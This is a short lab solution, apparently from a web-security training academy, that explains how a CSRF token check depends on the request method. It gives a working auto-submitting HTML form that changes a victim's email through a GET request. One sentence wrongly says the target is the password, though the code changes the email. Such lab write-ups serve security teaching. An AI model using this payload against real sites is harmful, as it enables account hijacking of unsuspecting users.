This web application uses a CSRF token to protect against CSRF attacks. The token is validated on the server, but the validation logic depends on the request method. Instead of using a POST request to change the user’s password, we instead use a GET request, and store the email parameter in the URI. This means that the CSRF token is not validated, and the email address is changed when a user visits our exploit server.
Solution:
<html>
<body>
<form action="https://2.web-security-academy.net/my-account/change-email">
<input
type="hidden"
name="email"
value="pwned@evil-user.net"
/>
</form>
<script>
history.pushState("", "", "/")
document.forms[0].submit()
</script>
</body>
</html>